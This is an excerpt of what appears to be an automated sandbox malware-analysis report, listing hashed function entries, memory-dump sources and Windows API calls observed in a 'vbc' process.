                                            • Opcode ID: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
                                            • Instruction ID: 41e4343c146f66e2bb318e135f4e172b2897deff735033a37a94e91f6413aa4b
                                            • Opcode Fuzzy Hash: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
                                            • Instruction Fuzzy Hash: DBB012B2100540C7E3099714D946B4B7210FB90F00F40C93BA11B81861DB3C993CD46A
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.507308179.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true
                                            • Associated: 00000005.00000002.507296853.0000000000A20000.00000040.00000001.sdmp Download File
                                            • Associated: 00000005.00000002.507950798.0000000000B10000.00000040.00000001.sdmp Download File
                                            • Associated: 00000005.00000002.507972739.0000000000B20000.00000040.00000001.sdmp Download File
                                            • Associated: 00000005.00000002.507996526.0000000000B24000.00000040.00000001.sdmp Download File
                                            • Associated: 00000005.00000002.508023829.0000000000B27000.00000040.00000001.sdmp Download File
                                            • Associated: 00000005.00000002.508086796.0000000000B30000.00000040.00000001.sdmp Download File
                                            • Associated: 00000005.00000002.508145129.0000000000B90000.00000040.00000001.sdmp Download File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_a20000_vbc.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                            • Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
                                            • Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                            • Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.507308179.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true
                                            • Associated: 00000005.00000002.507296853.0000000000A20000.00000040.00000001.sdmp Download File
                                            • Associated: 00000005.00000002.507950798.0000000000B10000.00000040.00000001.sdmp Download File
                                            • Associated: 00000005.00000002.507972739.0000000000B20000.00000040.00000001.sdmp Download File
                                            • Associated: 00000005.00000002.507996526.0000000000B24000.00000040.00000001.sdmp Download File
                                            • Associated: 00000005.00000002.508023829.0000000000B27000.00000040.00000001.sdmp Download File
                                            • Associated: 00000005.00000002.508086796.0000000000B30000.00000040.00000001.sdmp Download File
                                            • Associated: 00000005.00000002.508145129.0000000000B90000.00000040.00000001.sdmp Download File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_a20000_vbc.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                            • Instruction ID: 05ac91611fc184a3f88202f4b9a2f722369f22817df951cee1fa85cf63676e78
                                            • Opcode Fuzzy Hash: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                            • Instruction Fuzzy Hash: A2B01272605540C7F30ADB04D915B467251FBC0F00F408934E50746590D77D9E38D587
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.507308179.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true
                                            • Associated: 00000005.00000002.507296853.0000000000A20000.00000040.00000001.sdmp Download File
                                            • Associated: 00000005.00000002.507950798.0000000000B10000.00000040.00000001.sdmp Download File
                                            • Associated: 00000005.00000002.507972739.0000000000B20000.00000040.00000001.sdmp Download File
                                            • Associated: 00000005.00000002.507996526.0000000000B24000.00000040.00000001.sdmp Download File
                                            • Associated: 00000005.00000002.508023829.0000000000B27000.00000040.00000001.sdmp Download File
                                            • Associated: 00000005.00000002.508086796.0000000000B30000.00000040.00000001.sdmp Download File
                                            • Associated: 00000005.00000002.508145129.0000000000B90000.00000040.00000001.sdmp Download File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_a20000_vbc.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                            • Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
                                            • Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                            • Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.507308179.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true
                                            • Associated: 00000005.00000002.507296853.0000000000A20000.00000040.00000001.sdmp Download File
                                            • Associated: 00000005.00000002.507950798.0000000000B10000.00000040.00000001.sdmp Download File
                                            • Associated: 00000005.00000002.507972739.0000000000B20000.00000040.00000001.sdmp Download File
                                            • Associated: 00000005.00000002.507996526.0000000000B24000.00000040.00000001.sdmp Download File
                                            • Associated: 00000005.00000002.508023829.0000000000B27000.00000040.00000001.sdmp Download File
                                            • Associated: 00000005.00000002.508086796.0000000000B30000.00000040.00000001.sdmp Download File
                                            • Associated: 00000005.00000002.508145129.0000000000B90000.00000040.00000001.sdmp Download File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_a20000_vbc.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                            • Instruction ID: b885d126f35a04098635745a666b93c7a8e67e4acbf17db3f6051f78ecae7b76
                                            • Opcode Fuzzy Hash: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                            • Instruction Fuzzy Hash: 9AB01273104944C7E349A714DD06B8B7210FBC0F01F00893AA00786851DB389A2CE986
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.507308179.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true
                                            • Associated: 00000005.00000002.507296853.0000000000A20000.00000040.00000001.sdmp Download File
                                            • Associated: 00000005.00000002.507950798.0000000000B10000.00000040.00000001.sdmp Download File
                                            • Associated: 00000005.00000002.507972739.0000000000B20000.00000040.00000001.sdmp Download File
                                            • Associated: 00000005.00000002.507996526.0000000000B24000.00000040.00000001.sdmp Download File
                                            • Associated: 00000005.00000002.508023829.0000000000B27000.00000040.00000001.sdmp Download File
                                            • Associated: 00000005.00000002.508086796.0000000000B30000.00000040.00000001.sdmp Download File
                                            • Associated: 00000005.00000002.508145129.0000000000B90000.00000040.00000001.sdmp Download File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_a20000_vbc.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                            • Instruction ID: 98b7ab4c3374ce945d87304c272764997da5ea40185bb6170513ade09291bf69
                                            • Opcode Fuzzy Hash: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                            • Instruction Fuzzy Hash: 97B012721005C4C7E30D9714D906B8F7210FB80F00F00893AA40782861DB789A2CE45A
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.507308179.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true
                                            • Associated: 00000005.00000002.507296853.0000000000A20000.00000040.00000001.sdmp Download File
                                            • Associated: 00000005.00000002.507950798.0000000000B10000.00000040.00000001.sdmp Download File
                                            • Associated: 00000005.00000002.507972739.0000000000B20000.00000040.00000001.sdmp Download File
                                            • Associated: 00000005.00000002.507996526.0000000000B24000.00000040.00000001.sdmp Download File
                                            • Associated: 00000005.00000002.508023829.0000000000B27000.00000040.00000001.sdmp Download File
                                            • Associated: 00000005.00000002.508086796.0000000000B30000.00000040.00000001.sdmp Download File
                                            • Associated: 00000005.00000002.508145129.0000000000B90000.00000040.00000001.sdmp Download File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_a20000_vbc.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                            • Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
                                            • Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                            • Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.507308179.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true
                                            • Associated: 00000005.00000002.507296853.0000000000A20000.00000040.00000001.sdmp Download File
                                            • Associated: 00000005.00000002.507950798.0000000000B10000.00000040.00000001.sdmp Download File
                                            • Associated: 00000005.00000002.507972739.0000000000B20000.00000040.00000001.sdmp Download File
                                            • Associated: 00000005.00000002.507996526.0000000000B24000.00000040.00000001.sdmp Download File
                                            • Associated: 00000005.00000002.508023829.0000000000B27000.00000040.00000001.sdmp Download File
                                            • Associated: 00000005.00000002.508086796.0000000000B30000.00000040.00000001.sdmp Download File
                                            • Associated: 00000005.00000002.508145129.0000000000B90000.00000040.00000001.sdmp Download File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_a20000_vbc.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                                            • Instruction ID: 41c45e5f09b42d6e0ddb2dc3248e04f5cc5ab51982cd1fe1d329002f24c15819
                                            • Opcode Fuzzy Hash: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                                            • Instruction Fuzzy Hash: 14B01272104580C7E349AB14D90AB5BB210FB90F00F40893AE04B81850DA3C992CC546
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.507308179.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true
                                            • Associated: 00000005.00000002.507296853.0000000000A20000.00000040.00000001.sdmp Download File
                                            • Associated: 00000005.00000002.507950798.0000000000B10000.00000040.00000001.sdmp Download File
                                            • Associated: 00000005.00000002.507972739.0000000000B20000.00000040.00000001.sdmp Download File
                                            • Associated: 00000005.00000002.507996526.0000000000B24000.00000040.00000001.sdmp Download File
                                            • Associated: 00000005.00000002.508023829.0000000000B27000.00000040.00000001.sdmp Download File
                                            • Associated: 00000005.00000002.508086796.0000000000B30000.00000040.00000001.sdmp Download File
                                            • Associated: 00000005.00000002.508145129.0000000000B90000.00000040.00000001.sdmp Download File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_a20000_vbc.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                            • Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
                                            • Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                            • Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.507308179.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true
                                            • Associated: 00000005.00000002.507296853.0000000000A20000.00000040.00000001.sdmp Download File
                                            • Associated: 00000005.00000002.507950798.0000000000B10000.00000040.00000001.sdmp Download File
                                            • Associated: 00000005.00000002.507972739.0000000000B20000.00000040.00000001.sdmp Download File
                                            • Associated: 00000005.00000002.507996526.0000000000B24000.00000040.00000001.sdmp Download File
                                            • Associated: 00000005.00000002.508023829.0000000000B27000.00000040.00000001.sdmp Download File
                                            • Associated: 00000005.00000002.508086796.0000000000B30000.00000040.00000001.sdmp Download File
                                            • Associated: 00000005.00000002.508145129.0000000000B90000.00000040.00000001.sdmp Download File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_a20000_vbc.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                            • Instruction ID: c46011bb0c46dfed5c8ab186c0f719e5b9e72ad0d6ef7da6a0d9d2ed8661a3c9
                                            • Opcode Fuzzy Hash: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                            • Instruction Fuzzy Hash: 8FB0927110054087E205A704D905B4AB212FB90B00F808A35A4468A591D66A9A28C686
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.507308179.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true
                                            • Associated: 00000005.00000002.507296853.0000000000A20000.00000040.00000001.sdmp Download File
                                            • Associated: 00000005.00000002.507950798.0000000000B10000.00000040.00000001.sdmp Download File
                                            • Associated: 00000005.00000002.507972739.0000000000B20000.00000040.00000001.sdmp Download File
                                            • Associated: 00000005.00000002.507996526.0000000000B24000.00000040.00000001.sdmp Download File
                                            • Associated: 00000005.00000002.508023829.0000000000B27000.00000040.00000001.sdmp Download File
                                            • Associated: 00000005.00000002.508086796.0000000000B30000.00000040.00000001.sdmp Download File
                                            • Associated: 00000005.00000002.508145129.0000000000B90000.00000040.00000001.sdmp Download File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_a20000_vbc.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                            • Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
                                            • Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                            • Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.507308179.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true
                                            • Associated: 00000005.00000002.507296853.0000000000A20000.00000040.00000001.sdmp Download File
                                            • Associated: 00000005.00000002.507950798.0000000000B10000.00000040.00000001.sdmp Download File
                                            • Associated: 00000005.00000002.507972739.0000000000B20000.00000040.00000001.sdmp Download File
                                            • Associated: 00000005.00000002.507996526.0000000000B24000.00000040.00000001.sdmp Download File
                                            • Associated: 00000005.00000002.508023829.0000000000B27000.00000040.00000001.sdmp Download File
                                            • Associated: 00000005.00000002.508086796.0000000000B30000.00000040.00000001.sdmp Download File
                                            • Associated: 00000005.00000002.508145129.0000000000B90000.00000040.00000001.sdmp Download File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_a20000_vbc.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                                            • Instruction ID: c5322eb374cbfb3adeb08d178b54e1ae74a7d58a0408861c097d1ba4bd942992
                                            • Opcode Fuzzy Hash: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                                            • Instruction Fuzzy Hash: 0DB01272200640C7F31A9714D906F4B7210FB80F00F00893AA007C19A1DB389A2CD556
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.507308179.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true
                                            • Associated: 00000005.00000002.507296853.0000000000A20000.00000040.00000001.sdmp Download File
                                            • Associated: 00000005.00000002.507950798.0000000000B10000.00000040.00000001.sdmp Download File
                                            • Associated: 00000005.00000002.507972739.0000000000B20000.00000040.00000001.sdmp Download File
                                            • Associated: 00000005.00000002.507996526.0000000000B24000.00000040.00000001.sdmp Download File
                                            • Associated: 00000005.00000002.508023829.0000000000B27000.00000040.00000001.sdmp Download File
                                            • Associated: 00000005.00000002.508086796.0000000000B30000.00000040.00000001.sdmp Download File
                                            • Associated: 00000005.00000002.508145129.0000000000B90000.00000040.00000001.sdmp Download File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_a20000_vbc.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                            • Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
                                            • Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                            • Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.507308179.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true
                                            • Associated: 00000005.00000002.507296853.0000000000A20000.00000040.00000001.sdmp Download File
                                            • Associated: 00000005.00000002.507950798.0000000000B10000.00000040.00000001.sdmp Download File
                                            • Associated: 00000005.00000002.507972739.0000000000B20000.00000040.00000001.sdmp Download File
                                            • Associated: 00000005.00000002.507996526.0000000000B24000.00000040.00000001.sdmp Download File
                                            • Associated: 00000005.00000002.508023829.0000000000B27000.00000040.00000001.sdmp Download File
                                            • Associated: 00000005.00000002.508086796.0000000000B30000.00000040.00000001.sdmp Download File
                                            • Associated: 00000005.00000002.508145129.0000000000B90000.00000040.00000001.sdmp Download File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_a20000_vbc.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                            • Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
                                            • Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                            • Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000005.00000002.507081132.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_vbc.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ea422489a25dcefea3ed0f1b9a3fefea2ebcd7ffde6029fed25eb79b3bdcb825
                                            • Instruction ID: 31b1220a7bfbfd16f43a3644c83f2c17606f0388dd956b3420c92d1797c928f5
                                            • Opcode Fuzzy Hash: ea422489a25dcefea3ed0f1b9a3fefea2ebcd7ffde6029fed25eb79b3bdcb825
                                            • Instruction Fuzzy Hash: 202137B2D4020857CB25DA64AD42AEF73BCAB54304F04007FE949A7182F63CBE49CBA5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            APIs
                                            • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.507081132.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_vbc.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: MessagePostThread
                                            • String ID: (
                                            • API String ID: 1836367815-3887548279
                                            • Opcode ID: b784bc7f3e88494daba021be060d48e12c8f2a7faf1ca8a68c7348251b259488
                                            • Instruction ID: 3bd0e3de3a48e026a73040ff265cd42116660e97523665222c81487ff7b89774
                                            • Opcode Fuzzy Hash: b784bc7f3e88494daba021be060d48e12c8f2a7faf1ca8a68c7348251b259488
                                            • Instruction Fuzzy Hash: A201FE31A403187BE720A6A58C42FFE771CAF40F04F04401DFE44BA1C1D6F9691A47EA
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 27 41a020-41a051 call 41a950 RtlAllocateHeap
                                            APIs
                                            • RtlAllocateHeap.NTDLL(004144F6,?,oLA,00414C6F,?,004144F6,?,?,?,?,?,00000000,00409CC3,?), ref: 0041A04D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.507081132.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_vbc.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AllocateHeap
                                            • String ID: oLA
                                            • API String ID: 1279760036-3789366272
                                            • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                            • Instruction ID: 3e9cccf5f91448adbf19cee7c08a6922c38dacc77a606dc9f5f43a2a80c29887
                                            • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                            • Instruction Fuzzy Hash: 4BE012B1210208ABDB14EF99CC41EA777ACAF88664F118559BA185B242C630F9108AB0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 225 4082b3-4082b8 226 4082ea 225->226 227 4082ba-4082ce 225->227 228 4082f3-40833a call 41b850 call 41c3f0 call 40acc0 call 414e10 226->228 229 4082ec-4082f1 226->229 230 4082d5-4082dd 227->230 231 4082d0 call 41b140 227->231 240 40833c-40834e PostThreadMessageW 228->240 241 40836e-408372 228->241 229->228 231->230 242 408350-40836a call 40a450 240->242 243 40836d 240->243 242->243 243->241
                                            APIs
                                            • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.507081132.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_vbc.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: MessagePostThread
                                            • String ID:
                                            • API String ID: 1836367815-0
                                            • Opcode ID: 9a6df075b3a899bbcc8e66ea9f4f4b1dfdcf750ef061f88f866bd59aa0326e67
                                            • Instruction ID: 15bcf26793c5adb4b30de96ac94af9ddbe6e7cdc6d38737c83c8a5ad6bd04a3e
                                            • Opcode Fuzzy Hash: 9a6df075b3a899bbcc8e66ea9f4f4b1dfdcf750ef061f88f866bd59aa0326e67
                                            • Instruction Fuzzy Hash: 0F113B31940324BBD721A6A49C02FEE7368AF41B54F05006DFE04BB1C2E7B9A91583E9
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 262 41a231-41a232 263 41a234 262->263 264 41a1c7-41a1d9 262->264 265 41a236-41a252 263->265 266 41a218-41a230 call 41a950 263->266 267 41a1df-41a1f4 LookupPrivilegeValueW 264->267 268 41a1da call 41a950 264->268 270 41a25a-41a267 265->270 271 41a255 call 41a9c0 265->271 268->267 271->270
                                            APIs
                                            • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F192,0040F192,0000003C,00000000,?,00409D35), ref: 0041A1F0
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.507081132.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_vbc.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: LookupPrivilegeValue
                                            • String ID:
                                            • API String ID: 3899507212-0
                                            • Opcode ID: 56050d8244913e3bb370970d1dbd85be66a8c23741eff3f4d1711a73f959f3de
                                            • Instruction ID: bad0358d1984c2e8f8fd26a54909ca9b9a107d454ad3037bbbf37e326c04f907
                                            • Opcode Fuzzy Hash: 56050d8244913e3bb370970d1dbd85be66a8c23741eff3f4d1711a73f959f3de
                                            • Instruction Fuzzy Hash: 9E1104B41052846FDB11EFB8CC91CDBBFA8EF41220B00898EF8D847202C635E965CBA5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 246 4082e9-40833a call 41b850 call 41c3f0 call 40acc0 call 414e10 256 40833c-40834e PostThreadMessageW 246->256 257 40836e-408372 246->257 258 408350-40836a call 40a450 256->258 259 40836d 256->259 258->259 259->257
                                            APIs
                                            • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.507081132.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_vbc.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: MessagePostThread
                                            • String ID:
                                            • API String ID: 1836367815-0
                                            • Opcode ID: e021297182014d911c4727aa76fd82cc414bc15ba45ee236aca104e310637bf7
                                            • Instruction ID: c11f41c2e629a8b0ca5c2bb86d734e15c96e32f6bf9f39254c705a1de3a96043
                                            • Opcode Fuzzy Hash: e021297182014d911c4727aa76fd82cc414bc15ba45ee236aca104e310637bf7
                                            • Instruction Fuzzy Hash: CF012831A803187BE720A6A49C03FFF762C6B40F54F04401DFF04BA2C2E6A9690643EA
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 275 4082f0-40833a call 41b850 call 41c3f0 call 40acc0 call 414e10 285 40833c-40834e PostThreadMessageW 275->285 286 40836e-408372 275->286 287 408350-40836a call 40a450 285->287 288 40836d 285->288 287->288 288->286
                                            APIs
                                            • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.507081132.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_vbc.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: MessagePostThread
                                            • String ID:
                                            • API String ID: 1836367815-0
                                            • Opcode ID: 195adcb3c98d531bb162281db2f5ccaf52fb57ebc6795e714fc563aee22d5922
                                            • Instruction ID: 7ca1aeaa7978e6d3a4d0f1b4208387e2518013786dff53ee4b69e84d93d23419
                                            • Opcode Fuzzy Hash: 195adcb3c98d531bb162281db2f5ccaf52fb57ebc6795e714fc563aee22d5922
                                            • Instruction Fuzzy Hash: 7301AC31A803187BE720A6959C43FFF775C6B40F54F05411DFF04BA1C1D6A9691546FA
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 312 41a1b1-41a1d9 313 41a1df-41a1f4 LookupPrivilegeValueW 312->313 314 41a1da call 41a950 312->314 314->313
                                            APIs
                                            • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F192,0040F192,0000003C,00000000,?,00409D35), ref: 0041A1F0
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.507081132.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_vbc.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: LookupPrivilegeValue
                                            • String ID:
                                            • API String ID: 3899507212-0
                                            • Opcode ID: 81e7f82f74da59e32287c8610a01331687c91399019749a179af90c6b8378f79
                                            • Instruction ID: 6abfda86bcbcaadf275e5732025c7802f3ad21e74311e4aa4e9a40d80b62961e
                                            • Opcode Fuzzy Hash: 81e7f82f74da59e32287c8610a01331687c91399019749a179af90c6b8378f79
